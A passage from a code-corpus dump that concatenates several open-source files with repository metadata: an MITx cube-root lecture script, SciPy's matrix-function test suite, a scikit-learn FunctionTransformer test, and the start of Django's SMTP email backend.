columns=self._DISPLAY_HEADERS)
devendermishrajio/MITx-Foundations-of-Computer-Science
refs/heads/master
6.00.1x.Introduction-to-Computer-Science-and-Programming-Using-Python/Lecture Code/lectureCode_lec3.3.3.py
2
# lecture 3.3, slide 3 # Find the cube root of a perfect cube x = int(raw_input('Enter an integer: ')) for ans in range(0, abs(x)+1): if ans**3 == abs(x): break if ans**3 != abs(x): print(str(x) + ' is not a perfect cube') else: if x < 0: ans = -ans print('Cube root of ' + str(x) + ' is ' + str(ans))
jeffery-do/Vizdoombot
refs/heads/master
doom/lib/python3.5/site-packages/scipy/linalg/tests/test_matfuncs.py
24
#!/usr/bin/env python # # Created by: Pearu Peterson, March 2002 # """ Test functions for linalg.matfuncs module """ from __future__ import division, print_function, absolute_import import random import warnings import functools import numpy as np from numpy import array, matrix, identity, dot, sqrt, double from numpy.testing import (TestCase, run_module_suite, assert_array_equal, assert_array_less, assert_equal, assert_array_almost_equal, assert_array_almost_equal_nulp, assert_allclose, assert_, decorators) from scipy._lib._numpy_compat import _assert_warns import scipy.linalg from scipy.linalg import (funm, signm, logm, sqrtm, fractional_matrix_power, expm, expm_frechet, expm_cond, norm) from scipy.linalg.matfuncs import expm2, expm3 from scipy.linalg import _matfuncs_inv_ssq import scipy.linalg._expm_frechet from scipy.optimize import minimize def _get_al_mohy_higham_2012_experiment_1(): """ Return the test matrix from Experiment (1) of [1]_. References ---------- .. [1] Awad H. Al-Mohy and Nicholas J. Higham (2012) "Improved Inverse Scaling and Squaring Algorithms for the Matrix Logarithm." SIAM Journal on Scientific Computing, 34 (4). C152-C169. ISSN 1095-7197 """ A = np.array([ [3.2346e-1, 3e4, 3e4, 3e4], [0, 3.0089e-1, 3e4, 3e4], [0, 0, 3.2210e-1, 3e4], [0, 0, 0, 3.0744e-1]], dtype=float) return A class TestSignM(TestCase): def test_nils(self): a = array([[29.2, -24.2, 69.5, 49.8, 7.], [-9.2, 5.2, -18., -16.8, -2.], [-10., 6., -20., -18., -2.], [-9.6, 9.6, -25.5, -15.4, -2.], [9.8, -4.8, 18., 18.2, 2.]]) cr = array([[11.94933333,-2.24533333,15.31733333,21.65333333,-2.24533333], [-3.84266667,0.49866667,-4.59066667,-7.18666667,0.49866667], [-4.08,0.56,-4.92,-7.6,0.56], [-4.03466667,1.04266667,-5.59866667,-7.02666667,1.04266667], [4.15733333,-0.50133333,4.90933333,7.81333333,-0.50133333]]) r = signm(a) assert_array_almost_equal(r,cr) def test_defective1(self): a = array([[0.0,1,0,0],[1,0,1,0],[0,0,0,1],[0,0,1,0]]) r = signm(a, disp=False) #XXX: what would be the correct result? def test_defective2(self): a = array(( [29.2,-24.2,69.5,49.8,7.0], [-9.2,5.2,-18.0,-16.8,-2.0], [-10.0,6.0,-20.0,-18.0,-2.0], [-9.6,9.6,-25.5,-15.4,-2.0], [9.8,-4.8,18.0,18.2,2.0])) r = signm(a, disp=False) #XXX: what would be the correct result? def test_defective3(self): a = array([[-2., 25., 0., 0., 0., 0., 0.], [0., -3., 10., 3., 3., 3., 0.], [0., 0., 2., 15., 3., 3., 0.], [0., 0., 0., 0., 15., 3., 0.], [0., 0., 0., 0., 3., 10., 0.], [0., 0., 0., 0., 0., -2., 25.], [0., 0., 0., 0., 0., 0., -3.]]) r = signm(a, disp=False) #XXX: what would be the correct result? class TestLogM(TestCase): def test_nils(self): a = array([[-2., 25., 0., 0., 0., 0., 0.], [0., -3., 10., 3., 3., 3., 0.], [0., 0., 2., 15., 3., 3., 0.], [0., 0., 0., 0., 15., 3., 0.], [0., 0., 0., 0., 3., 10., 0.], [0., 0., 0., 0., 0., -2., 25.], [0., 0., 0., 0., 0., 0., -3.]]) m = (identity(7)*3.1+0j)-a logm(m, disp=False) #XXX: what would be the correct result? def test_al_mohy_higham_2012_experiment_1_logm(self): # The logm completes the round trip successfully. # Note that the expm leg of the round trip is badly conditioned. A = _get_al_mohy_higham_2012_experiment_1() A_logm, info = logm(A, disp=False) A_round_trip = expm(A_logm) assert_allclose(A_round_trip, A, rtol=1e-5, atol=1e-14) def test_al_mohy_higham_2012_experiment_1_funm_log(self): # The raw funm with np.log does not complete the round trip. # Note that the expm leg of the round trip is badly conditioned. A = _get_al_mohy_higham_2012_experiment_1() A_funm_log, info = funm(A, np.log, disp=False) A_round_trip = expm(A_funm_log) assert_(not np.allclose(A_round_trip, A, rtol=1e-5, atol=1e-14)) def test_round_trip_random_float(self): np.random.seed(1234) for n in range(1, 6): M_unscaled = np.random.randn(n, n) for scale in np.logspace(-4, 4, 9): M = M_unscaled * scale # Eigenvalues are related to the branch cut. W = np.linalg.eigvals(M) err_msg = 'M:{0} eivals:{1}'.format(M, W) # Check sqrtm round trip because it is used within logm. M_sqrtm, info = sqrtm(M, disp=False) M_sqrtm_round_trip = M_sqrtm.dot(M_sqrtm) assert_allclose(M_sqrtm_round_trip, M) # Check logm round trip. M_logm, info = logm(M, disp=False) M_logm_round_trip = expm(M_logm) assert_allclose(M_logm_round_trip, M, err_msg=err_msg) def test_round_trip_random_complex(self): np.random.seed(1234) for n in range(1, 6): M_unscaled = np.random.randn(n, n) + 1j * np.random.randn(n, n) for scale in np.logspace(-4, 4, 9): M = M_unscaled * scale M_logm, info = logm(M, disp=False) M_round_trip = expm(M_logm) assert_allclose(M_round_trip, M) def test_logm_type_preservation_and_conversion(self): # The logm matrix function should preserve the type of a matrix # whose eigenvalues are positive with zero imaginary part. # Test this preservation for variously structured matrices. complex_dtype_chars = ('F', 'D', 'G') for matrix_as_list in ( [[1, 0], [0, 1]], [[1, 0], [1, 1]], [[2, 1], [1, 1]], [[2, 3], [1, 2]]): # check that the spectrum has the expected properties W = scipy.linalg.eigvals(matrix_as_list) assert_(not any(w.imag or w.real < 0 for w in W)) # check float type preservation A = np.array(matrix_as_list, dtype=float) A_logm, info = logm(A, disp=False) assert_(A_logm.dtype.char not in complex_dtype_chars) # check complex type preservation A = np.array(matrix_as_list, dtype=complex) A_logm, info = logm(A, disp=False) assert_(A_logm.dtype.char in complex_dtype_chars) # check float->complex type conversion for the matrix negation A = -np.array(matrix_as_list, dtype=float) A_logm, info = logm(A, disp=False) assert_(A_logm.dtype.char in complex_dtype_chars) def test_complex_spectrum_real_logm(self): # This matrix has complex eigenvalues and real logm. # Its output dtype depends on its input dtype. M = [[1, 1, 2], [2, 1, 1], [1, 2, 1]] for dt in float, complex: X = np.array(M, dtype=dt) w = scipy.linalg.eigvals(X) assert_(1e-2 < np.absolute(w.imag).sum()) Y, info = logm(X, disp=False) assert_(np.issubdtype(Y.dtype, dt)) assert_allclose(expm(Y), X) def test_real_mixed_sign_spectrum(self): # These matrices have real eigenvalues with mixed signs. # The output logm dtype is complex, regardless of input dtype. for M in ( [[1, 0], [0, -1]], [[0, 1], [1, 0]]): for dt in float, complex: A = np.array(M, dtype=dt) A_logm, info = logm(A, disp=False) assert_(np.issubdtype(A_logm.dtype, complex)) def test_exactly_singular(self): A = np.array([[0, 0], [1j, 1j]]) B = np.asarray([[1, 1], [0, 0]]) for M in A, A.T, B, B.T: expected_warning = _matfuncs_inv_ssq.LogmExactlySingularWarning L, info = _assert_warns(expected_warning, logm, M, disp=False) E = expm(L) assert_allclose(E, M, atol=1e-14) def test_nearly_singular(self): M = np.array([[1e-100]]) expected_warning = _matfuncs_inv_ssq.LogmNearlySingularWarning L, info = _assert_warns(expected_warning, logm, M, disp=False) E = expm(L) assert_allclose(E, M, atol=1e-14) def test_opposite_sign_complex_eigenvalues(self): # See gh-6113 E = [[0, 1], [-1, 0]] L = [[0, np.pi*0.5], [-np.pi*0.5, 0]] assert_allclose(expm(L), E, atol=1e-14) assert_allclose(logm(E), L, atol=1e-14) E = [[1j, 4], [0, -1j]] L = [[1j*np.pi*0.5, 2*np.pi], [0, -1j*np.pi*0.5]] assert_allclose(expm(L), E, atol=1e-14) assert_allclose(logm(E), L, atol=1e-14) E = [[1j, 0], [0, -1j]] L = [[1j*np.pi*0.5, 0], [0, -1j*np.pi*0.5]] assert_allclose(expm(L), E, atol=1e-14) assert_allclose(logm(E), L, atol=1e-14) class TestSqrtM(TestCase): def test_round_trip_random_float(self): np.random.seed(1234) for n in range(1, 6): M_unscaled = np.random.randn(n, n) for scale in np.logspace(-4, 4, 9): M = M_unscaled * scale M_sqrtm, info = sqrtm(M, disp=False) M_sqrtm_round_trip = M_sqrtm.dot(M_sqrtm) assert_allclose(M_sqrtm_round_trip, M) def test_round_trip_random_complex(self): np.random.seed(1234) for n in range(1, 6): M_unscaled = np.random.randn(n, n) + 1j * np.random.randn(n, n) for scale in np.logspace(-4, 4, 9): M = M_unscaled * scale M_sqrtm, info = sqrtm(M, disp=False) M_sqrtm_round_trip = M_sqrtm.dot(M_sqrtm) assert_allclose(M_sqrtm_round_trip, M) def test_bad(self): # See http://www.maths.man.ac.uk/~nareports/narep336.ps.gz e = 2**-5 se = sqrt(e) a = array([[1.0,0,0,1], [0,e,0,0], [0,0,e,0], [0,0,0,1]]) sa = array([[1,0,0,0.5], [0,se,0,0], [0,0,se,0], [0,0,0,1]]) n = a.shape[0] assert_array_almost_equal(dot(sa,sa),a) # Check default sqrtm. esa = sqrtm(a, disp=False, blocksize=n)[0] assert_array_almost_equal(dot(esa,esa),a) # Check sqrtm with 2x2 blocks. esa = sqrtm(a, disp=False, blocksize=2)[0] assert_array_almost_equal(dot(esa,esa),a) def test_sqrtm_type_preservation_and_conversion(self): # The sqrtm matrix function should preserve the type of a matrix # whose eigenvalues are nonnegative with zero imaginary part. # Test this preservation for variously structured matrices. complex_dtype_chars = ('F', 'D', 'G') for matrix_as_list in ( [[1, 0], [0, 1]], [[1, 0], [1, 1]], [[2, 1], [1, 1]], [[2, 3], [1, 2]], [[1, 1], [1, 1]]): # check that the spectrum has the expected properties W = scipy.linalg.eigvals(matrix_as_list) assert_(not any(w.imag or w.real < 0 for w in W)) # check float type preservation A = np.array(matrix_as_list, dtype=float) A_sqrtm, info = sqrtm(A, disp=False) assert_(A_sqrtm.dtype.char not in complex_dtype_chars) # check complex type preservation A = np.array(matrix_as_list, dtype=complex) A_sqrtm, info = sqrtm(A, disp=False) assert_(A_sqrtm.dtype.char in complex_dtype_chars) # check float->complex type conversion for the matrix negation A = -np.array(matrix_as_list, dtype=float) A_sqrtm, info = sqrtm(A, disp=False) assert_(A_sqrtm.dtype.char in complex_dtype_chars) def test_sqrtm_type_conversion_mixed_sign_or_complex_spectrum(self): complex_dtype_chars = ('F', 'D', 'G') for matrix_as_list in ( [[1, 0], [0, -1]], [[0, 1], [1, 0]], [[0, 1, 0], [0, 0, 1], [1, 0, 0]]): # check that the spectrum has the expected properties W = scipy.linalg.eigvals(matrix_as_list) assert_(any(w.imag or w.real < 0 for w in W)) # check complex->complex A = np.array(matrix_as_list, dtype=complex) A_sqrtm, info = sqrtm(A, disp=False) assert_(A_sqrtm.dtype.char in complex_dtype_chars) # check float->complex A = np.array(matrix_as_list, dtype=float) A_sqrtm, info = sqrtm(A, disp=False) assert_(A_sqrtm.dtype.char in complex_dtype_chars) def test_blocksizes(self): # Make sure I do not goof up the blocksizes when they do not divide n. np.random.seed(1234) for n in range(1, 8): A = np.random.rand(n, n) + 1j*np.random.randn(n, n) A_sqrtm_default, info = sqrtm(A, disp=False, blocksize=n) assert_allclose(A, np.linalg.matrix_power(A_sqrtm_default, 2)) for blocksize in range(1, 10): A_sqrtm_new, info = sqrtm(A, disp=False, blocksize=blocksize) assert_allclose(A_sqrtm_default, A_sqrtm_new) def test_al_mohy_higham_2012_experiment_1(self): # Matrix square root of a tricky upper triangular matrix. A = _get_al_mohy_higham_2012_experiment_1() A_sqrtm, info = sqrtm(A, disp=False) A_round_trip = A_sqrtm.dot(A_sqrtm) assert_allclose(A_round_trip, A, rtol=1e-5) assert_allclose(np.tril(A_round_trip), np.tril(A)) def test_strict_upper_triangular(self): # This matrix has no square root. for dt in int, float: A = np.array([ [0, 3, 0, 0], [0, 0, 3, 0], [0, 0, 0, 3], [0, 0, 0, 0]], dtype=dt) A_sqrtm, info = sqrtm(A, disp=False) assert_(np.isnan(A_sqrtm).all()) def test_weird_matrix(self): # The square root of matrix B exists. for dt in int, float: A = np.array([ [0, 0, 1], [0, 0, 0], [0, 1, 0]], dtype=dt) B = np.array([ [0, 1, 0], [0, 0, 0], [0, 0, 0]], dtype=dt) assert_array_equal(B, A.dot(A)) # But scipy sqrtm is not clever enough to find it. B_sqrtm, info = sqrtm(B, disp=False) assert_(np.isnan(B_sqrtm).all()) def test_disp(self): from io import StringIO np.random.seed(1234) A = np.random.rand(3, 3) B = sqrtm(A, disp=True) assert_allclose(B.dot(B), A) def test_opposite_sign_complex_eigenvalues(self): M = [[2j, 4], [0, -2j]] R = [[1+1j, 2], [0, 1-1j]] assert_allclose(np.dot(R, R), M, atol=1e-14) assert_allclose(sqrtm(M), R, atol=1e-14) class TestFractionalMatrixPower(TestCase): def test_round_trip_random_complex(self): np.random.seed(1234) for p in range(1, 5): for n in range(1, 5): M_unscaled = np.random.randn(n, n) + 1j * np.random.randn(n, n) for scale in np.logspace(-4, 4, 9): M = M_unscaled * scale M_root = fractional_matrix_power(M, 1/p) M_round_trip = np.linalg.matrix_power(M_root, p) assert_allclose(M_round_trip, M) def test_round_trip_random_float(self): # This test is more annoying because it can hit the branch cut; # this happens when the matrix has an eigenvalue # with no imaginary component and with a real negative component, # and it means that the principal branch does not exist. np.random.seed(1234) for p in range(1, 5): for n in range(1, 5): M_unscaled = np.random.randn(n, n) for scale in np.logspace(-4, 4, 9): M = M_unscaled * scale M_root = fractional_matrix_power(M, 1/p) M_round_trip = np.linalg.matrix_power(M_root, p) assert_allclose(M_round_trip, M) def test_larger_abs_fractional_matrix_powers(self): np.random.seed(1234) for n in (2, 3, 5): for i in range(10): M = np.random.randn(n, n) + 1j * np.random.randn(n, n) M_one_fifth = fractional_matrix_power(M, 0.2) # Test the round trip. M_round_trip = np.linalg.matrix_power(M_one_fifth, 5) assert_allclose(M, M_round_trip) # Test a large abs fractional power. X = fractional_matrix_power(M, -5.4) Y = np.linalg.matrix_power(M_one_fifth, -27) assert_allclose(X, Y) # Test another large abs fractional power. X = fractional_matrix_power(M, 3.8) Y = np.linalg.matrix_power(M_one_fifth, 19) assert_allclose(X, Y) def test_random_matrices_and_powers(self): # Each independent iteration of this fuzz test picks random parameters. # It tries to hit some edge cases. np.random.seed(1234) nsamples = 20 for i in range(nsamples): # Sample a matrix size and a random real power. n = random.randrange(1, 5) p = np.random.randn() # Sample a random real or complex matrix. matrix_scale = np.exp(random.randrange(-4, 5)) A = np.random.randn(n, n) if random.choice((True, False)): A = A + 1j * np.random.randn(n, n) A = A * matrix_scale # Check a couple of analytically equivalent ways # to compute the fractional matrix power. # These can be compared because they both use the principal branch. A_power = fractional_matrix_power(A, p) A_logm, info = logm(A, disp=False) A_power_expm_logm = expm(A_logm * p) assert_allclose(A_power, A_power_expm_logm) def test_al_mohy_higham_2012_experiment_1(self): # Fractional powers of a tricky upper triangular matrix. A = _get_al_mohy_higham_2012_experiment_1() # Test remainder matrix power. A_funm_sqrt, info = funm(A, np.sqrt, disp=False) A_sqrtm, info = sqrtm(A, disp=False) A_rem_power = _matfuncs_inv_ssq._remainder_matrix_power(A, 0.5) A_power = fractional_matrix_power(A, 0.5) assert_array_equal(A_rem_power, A_power) assert_allclose(A_sqrtm, A_power) assert_allclose(A_sqrtm, A_funm_sqrt) # Test more fractional powers. for p in (1/2, 5/3): A_power = fractional_matrix_power(A, p) A_round_trip = fractional_matrix_power(A_power, 1/p) assert_allclose(A_round_trip, A, rtol=1e-2) assert_allclose(np.tril(A_round_trip, 1), np.tril(A, 1)) def test_briggs_helper_function(self): np.random.seed(1234) for a in np.random.randn(10) + 1j * np.random.randn(10): for k in range(5): x_observed = _matfuncs_inv_ssq._briggs_helper_function(a, k) x_expected = a ** np.exp2(-k) - 1 assert_allclose(x_observed, x_expected) def test_type_preservation_and_conversion(self): # The fractional_matrix_power matrix function should preserve # the type of a matrix whose eigenvalues # are positive with zero imaginary part. # Test this preservation for variously structured matrices. complex_dtype_chars = ('F', 'D', 'G') for matrix_as_list in ( [[1, 0], [0, 1]], [[1, 0], [1, 1]], [[2, 1], [1, 1]], [[2, 3], [1, 2]]): # check that the spectrum has the expected properties W = scipy.linalg.eigvals(matrix_as_list) assert_(not any(w.imag or w.real < 0 for w in W)) # Check various positive and negative powers # with absolute values bigger and smaller than 1. for p in (-2.4, -0.9, 0.2, 3.3): # check float type preservation A = np.array(matrix_as_list, dtype=float) A_power = fractional_matrix_power(A, p) assert_(A_power.dtype.char not in complex_dtype_chars) # check complex type preservation A = np.array(matrix_as_list, dtype=complex) A_power = fractional_matrix_power(A, p) assert_(A_power.dtype.char in complex_dtype_chars) # check float->complex for the matrix negation A = -np.array(matrix_as_list, dtype=float) A_power = fractional_matrix_power(A, p) assert_(A_power.dtype.char in complex_dtype_chars) def test_type_conversion_mixed_sign_or_complex_spectrum(self): complex_dtype_chars = ('F', 'D', 'G') for matrix_as_list in ( [[1, 0], [0, -1]], [[0, 1], [1, 0]], [[0, 1, 0], [0, 0, 1], [1, 0, 0]]): # check that the spectrum has the expected properties W = scipy.linalg.eigvals(matrix_as_list) assert_(any(w.imag or w.real < 0 for w in W)) # Check various positive and negative powers # with absolute values bigger and smaller than 1. for p in (-2.4, -0.9, 0.2, 3.3): # check complex->complex A = np.array(matrix_as_list, dtype=complex) A_power = fractional_matrix_power(A, p) assert_(A_power.dtype.char in complex_dtype_chars) # check float->complex A = np.array(matrix_as_list, dtype=float) A_power = fractional_matrix_power(A, p) assert_(A_power.dtype.char in complex_dtype_chars) @decorators.knownfailureif(True, 'Too unstable across LAPACKs.') def test_singular(self): # Negative fractional powers do not work with singular matrices. for matrix_as_list in ( [[0, 0], [0, 0]], [[1, 1], [1, 1]], [[1, 2], [3, 6]], [[0, 0, 0], [0, 1, 1], [0, -1, 1]]): # Check fractional powers both for float and for complex types. for newtype in (float, complex): A = np.array(matrix_as_list, dtype=newtype) for p in (-0.7, -0.9, -2.4, -1.3): A_power = fractional_matrix_power(A, p) assert_(np.isnan(A_power).all()) for p in (0.2, 1.43): A_power = fractional_matrix_power(A, p) A_round_trip = fractional_matrix_power(A_power, 1/p) assert_allclose(A_round_trip, A) def test_opposite_sign_complex_eigenvalues(self): M = [[2j, 4], [0, -2j]] R = [[1+1j, 2], [0, 1-1j]] assert_allclose(np.dot(R, R), M, atol=1e-14) assert_allclose(fractional_matrix_power(M, 0.5), R, atol=1e-14) class TestExpM(TestCase): def test_zero(self): with warnings.catch_warnings(): warnings.simplefilter("ignore", DeprecationWarning) a = array([[0.,0],[0,0]]) assert_array_almost_equal(expm(a),[[1,0],[0,1]]) assert_array_almost_equal(expm2(a),[[1,0],[0,1]]) assert_array_almost_equal(expm3(a),[[1,0],[0,1]]) def test_consistency(self): with warnings.catch_warnings(): warnings.simplefilter("ignore", DeprecationWarning) a = array([[0.,1],[-1,0]]) assert_array_almost_equal(expm(a), expm2(a)) assert_array_almost_equal(expm(a), expm3(a)) a = array([[1j,1],[-1,-2j]]) assert_array_almost_equal(expm(a), expm2(a)) assert_array_almost_equal(expm(a), expm3(a)) def test_npmatrix(self): with warnings.catch_warnings(): warnings.simplefilter("ignore", DeprecationWarning) a = matrix([[3.,0],[0,-3.]]) assert_array_almost_equal(expm(a), expm2(a)) def test_single_elt(self): # See gh-5853 from scipy.sparse import csc_matrix vOne = -2.02683397006j vTwo = -2.12817566856j mOne = csc_matrix([[vOne]], dtype='complex') mTwo = csc_matrix([[vTwo]], dtype='complex') outOne = expm(mOne) outTwo = expm(mTwo) assert_equal(type(outOne), type(mOne)) assert_equal(type(outTwo), type(mTwo)) assert_allclose(outOne[0, 0], complex(-0.44039415155949196, -0.8978045395698304)) assert_allclose(outTwo[0, 0], complex(-0.52896401032626006, -0.84864425749518878)) class TestExpmFrechet(TestCase): def test_expm_frechet(self): # a test of the basic functionality M = np.array([ [1, 2, 3, 4], [5, 6, 7, 8], [0, 0, 1, 2], [0, 0, 5, 6], ], dtype=float) A = np.array([ [1, 2], [5, 6], ], dtype=float) E = np.array([ [3, 4], [7, 8], ], dtype=float) expected_expm = scipy.linalg.expm(A) expected_frechet = scipy.linalg.expm(M)[:2, 2:] for kwargs in ({}, {'method':'SPS'}, {'method':'blockEnlarge'}): observed_expm, observed_frechet = expm_frechet(A, E, **kwargs) assert_allclose(expected_expm, observed_expm) assert_allclose(expected_frechet, observed_frechet) def test_small_norm_expm_frechet(self): # methodically test matrices with a range of norms, for better coverage M_original = np.array([ [1, 2, 3, 4], [5, 6, 7, 8], [0, 0, 1, 2], [0, 0, 5, 6], ], dtype=float) A_original = np.array([ [1, 2], [5, 6], ], dtype=float) E_original = np.array([ [3, 4], [7, 8], ], dtype=float) A_original_norm_1 = scipy.linalg.norm(A_original, 1) selected_m_list = [1, 3, 5, 7, 9, 11, 13, 15] m_neighbor_pairs = zip(selected_m_list[:-1], selected_m_list[1:]) for ma, mb in m_neighbor_pairs: ell_a = scipy.linalg._expm_frechet.ell_table_61[ma] ell_b = scipy.linalg._expm_frechet.ell_table_61[mb] target_norm_1 = 0.5 * (ell_a + ell_b) scale = target_norm_1 / A_original_norm_1 M = scale * M_original A = scale * A_original E = scale * E_original expected_expm = scipy.linalg.expm(A) expected_frechet = scipy.linalg.expm(M)[:2, 2:] observed_expm, observed_frechet = expm_frechet(A, E) assert_allclose(expected_expm, observed_expm) assert_allclose(expected_frechet, observed_frechet) def test_fuzz(self): # try a bunch of crazy inputs rfuncs = ( np.random.uniform, np.random.normal, np.random.standard_cauchy, np.random.exponential) ntests = 100 for i in range(ntests): rfunc = random.choice(rfuncs) target_norm_1 = random.expovariate(1.0) n = random.randrange(2, 16) A_original = rfunc(size=(n,n)) E_original = rfunc(size=(n,n)) A_original_norm_1 = scipy.linalg.norm(A_original, 1) scale = target_norm_1 / A_original_norm_1 A = scale * A_original E = scale * E_original M = np.vstack([ np.hstack([A, E]), np.hstack([np.zeros_like(A), A])]) expected_expm = scipy.linalg.expm(A) expected_frechet = scipy.linalg.expm(M)[:n, n:] observed_expm, observed_frechet = expm_frechet(A, E) assert_allclose(expected_expm, observed_expm) assert_allclose(expected_frechet, observed_frechet) def test_problematic_matrix(self): # this test case uncovered a bug which has since been fixed A = np.array([ [1.50591997, 1.93537998], [0.41203263, 0.23443516], ], dtype=float) E = np.array([ [1.87864034, 2.07055038], [1.34102727, 0.67341123], ], dtype=float) A_norm_1 = scipy.linalg.norm(A, 1) sps_expm, sps_frechet = expm_frechet( A, E, method='SPS') blockEnlarge_expm, blockEnlarge_frechet = expm_frechet( A, E, method='blockEnlarge') assert_allclose(sps_expm, blockEnlarge_expm) assert_allclose(sps_frechet, blockEnlarge_frechet) @decorators.slow @decorators.skipif(True, 'this test is deliberately slow') def test_medium_matrix(self): # profile this to see the speed difference n = 1000 A = np.random.exponential(size=(n, n)) E = np.random.exponential(size=(n, n)) sps_expm, sps_frechet = expm_frechet( A, E, method='SPS') blockEnlarge_expm, blockEnlarge_frechet = expm_frechet( A, E, method='blockEnlarge') assert_allclose(sps_expm, blockEnlarge_expm) assert_allclose(sps_frechet, blockEnlarge_frechet) def _help_expm_cond_search(A, A_norm, X, X_norm, eps, p): p = np.reshape(p, A.shape) p_norm = norm(p) perturbation = eps * p * (A_norm / p_norm) X_prime = expm(A + perturbation) scaled_relative_error = norm(X_prime - X) / (X_norm * eps) return -scaled_relative_error def _normalized_like(A, B): return A * (scipy.linalg.norm(B) / scipy.linalg.norm(A)) def _relative_error(f, A, perturbation): X = f(A) X_prime = f(A + perturbation) return norm(X_prime - X) / norm(X) class TestExpmConditionNumber(TestCase): def test_expm_cond_smoke(self): np.random.seed(1234) for n in range(1, 4): A = np.random.randn(n, n) kappa = expm_cond(A) assert_array_less(0, kappa) def test_expm_bad_condition_number(self): A = np.array([ [-1.128679820, 9.614183771e4, -4.524855739e9, 2.924969411e14], [0, -1.201010529, 9.634696872e4, -4.681048289e9], [0, 0, -1.132893222, 9.532491830e4], [0, 0, 0, -1.179475332], ]) kappa = expm_cond(A) assert_array_less(1e36, kappa) def test_univariate(self): np.random.seed(12345) for x in np.linspace(-5, 5, num=11): A = np.array([[x]]) assert_allclose(expm_cond(A), abs(x)) for x in np.logspace(-2, 2, num=11): A = np.array([[x]]) assert_allclose(expm_cond(A), abs(x)) for i in range(10): A = np.random.randn(1, 1) assert_allclose(expm_cond(A), np.absolute(A)[0, 0]) @decorators.slow def test_expm_cond_fuzz(self): np.random.seed(12345) eps = 1e-5 nsamples = 10 for i in range(nsamples): n = np.random.randint(2, 5) A = np.random.randn(n, n) A_norm = scipy.linalg.norm(A) X = expm(A) X_norm = scipy.linalg.norm(X) kappa = expm_cond(A) # Look for the small perturbation that gives the greatest # relative error. f = functools.partial(_help_expm_cond_search, A, A_norm, X, X_norm, eps) guess = np.ones(n*n) out = minimize(f, guess, method='L-BFGS-B') xopt = out.x yopt = f(xopt) p_best = eps * _normalized_like(np.reshape(xopt, A.shape), A) p_best_relerr = _relative_error(expm, A, p_best) assert_allclose(p_best_relerr, -yopt * eps) # Check that the identified perturbation indeed gives greater # relative error than random perturbations with similar norms. for j in range(5): p_rand = eps * _normalized_like(np.random.randn(*A.shape), A) assert_allclose(norm(p_best), norm(p_rand)) p_rand_relerr = _relative_error(expm, A, p_rand) assert_array_less(p_rand_relerr, p_best_relerr) # The greatest relative error should not be much greater than # eps times the condition number kappa. # In the limit as eps approaches zero it should never be greater. assert_array_less(p_best_relerr, (1 + 2*eps) * eps * kappa) if __name__ == "__main__": run_module_suite()
liangz0707/scikit-learn
refs/heads/master
sklearn/preprocessing/tests/test_function_transformer.py
176
from nose.tools import assert_equal import numpy as np from sklearn.preprocessing import FunctionTransformer def _make_func(args_store, kwargs_store, func=lambda X, *a, **k: X): def _func(X, *args, **kwargs): args_store.append(X) args_store.extend(args) kwargs_store.update(kwargs) return func(X) return _func def test_delegate_to_func(): # (args|kwargs)_store will hold the positional and keyword arguments # passed to the function inside the FunctionTransformer. args_store = [] kwargs_store = {} X = np.arange(10).reshape((5, 2)) np.testing.assert_array_equal( FunctionTransformer(_make_func(args_store, kwargs_store)).transform(X), X, 'transform should have returned X unchanged', ) # The function should only have recieved X. assert_equal( args_store, [X], 'Incorrect positional arguments passed to func: {args}'.format( args=args_store, ), ) assert_equal( kwargs_store, {}, 'Unexpected keyword arguments passed to func: {args}'.format( args=kwargs_store, ), ) # reset the argument stores. args_store[:] = [] # python2 compatible inplace list clear. kwargs_store.clear() y = object() np.testing.assert_array_equal( FunctionTransformer( _make_func(args_store, kwargs_store), pass_y=True, ).transform(X, y), X, 'transform should have returned X unchanged', ) # The function should have recieved X and y. assert_equal( args_store, [X, y], 'Incorrect positional arguments passed to func: {args}'.format( args=args_store, ), ) assert_equal( kwargs_store, {}, 'Unexpected keyword arguments passed to func: {args}'.format( args=kwargs_store, ), ) def test_np_log(): X = np.arange(10).reshape((5, 2)) # Test that the numpy.log example still works. np.testing.assert_array_equal( FunctionTransformer(np.log1p).transform(X), np.log1p(X), )
WhySoGeeky/DroidPot
refs/heads/master
venv/lib/python2.7/site-packages/django/core/mail/backends/smtp.py
477
"""SMTP email backend class.""" import smtplib import ssl import threading from django.conf import settings from django.core.mail.backends.base import BaseEmailBackend from django.core.mail.message import sanitize_address from django.core.mail.utils import DNS_NAME class EmailBackend(BaseEmailBackend): """ A wrapper that manages the SMTP network connection. """ def __init__(self, host=None, port=None, username=None, password=None, use_tls=None, fail_silently=False, use_ssl=None, timeout=None, ssl_keyfile=None, ssl_certfile=None, **kwargs): super(EmailBackend, self).__init__(fail_silently=fail_silently) self.host = host or settings.EMAIL_HOST self.port = port or settings.EMAIL_PORT self.username = settings.EMAIL_HOST_USER if username is None else username self.password = settings.EMAIL_HOST_PASSWORD if password is None else password self.use_tls = settings.EMAIL_USE_TLS if use_tls is None else use_tls self.use_ssl = settings.EMAIL_USE_SSL if use_ssl is None else use_ssl self.timeout = settings.EMAIL_TIMEOUT if timeout is None else timeout self.ssl_keyfile = settings.EMAIL_SSL_KEYFILE if ssl_keyfile is None else ssl_keyfile self.ssl_certfile = settings.EMAIL_SSL_CERTFILE if ssl_certfile is None else ssl_certfile if self.use_ssl and self.use_tls: raise ValueError( "EMAIL_USE_TLS/EMAIL_USE_SSL are mutually exclusive, so only set " "one of those settings to True.") self.connection = None self._lock = threading.RLock() def open(self): """ Ensures we have a connection to the email server. Returns whether or not a new connection was required (True or False). """ if self.connection: # Nothing to do if the connection is already open. return False connection_class = smtplib.SMTP_SSL if self.use_ssl else smtplib.SMTP # If local_hostname is not specified, socket.getfqdn() gets used. # For performance, we use the cached FQDN for local_hostname. connection_params = {'local_hostname': DNS_NAME.get_fqdn()} if self.timeout is not None: connection_params['timeout'] = self.timeout if self.use_ssl: connection_params.update({ 'keyfile': self.ssl_keyfile, 'certfile': self.ssl_certfile, }) try: self.connection = connection_class(self.host, self.port, **connection_params) # TLS/SSL are mutually exclusive, so only attempt TLS over # non-secure connections. if not self.use_ssl and self.use_tls: self.connection.ehlo() self.connection.starttls(keyfile=self.ssl_keyfile, certfile=self.ssl_certfile) self.connection.ehlo() if self.username and self.password: self.connection.login(self.username, self.password) return True except smtplib.SMTPException: if not self.fail_silently: raise def close(self): """Closes the connection to the email server.""" if self.connection is None: return try: try: self.connection.quit() except (ssl.SSLError, smtplib.SMTPServerDisconnected): # This happens when calling quit() on a TLS connection # sometimes, or when the connection was already disconnected # by the server. self.connection.close() except smtplib.SMTPException: if self.fail_silently: return raise finally: self.connection = None def send_messages(self, email_messages): """ Sends one or more EmailMessage objects and returns the number of email messages sent. """ if not email_messages: return with self._lock: new_conn_created = self.open() if not 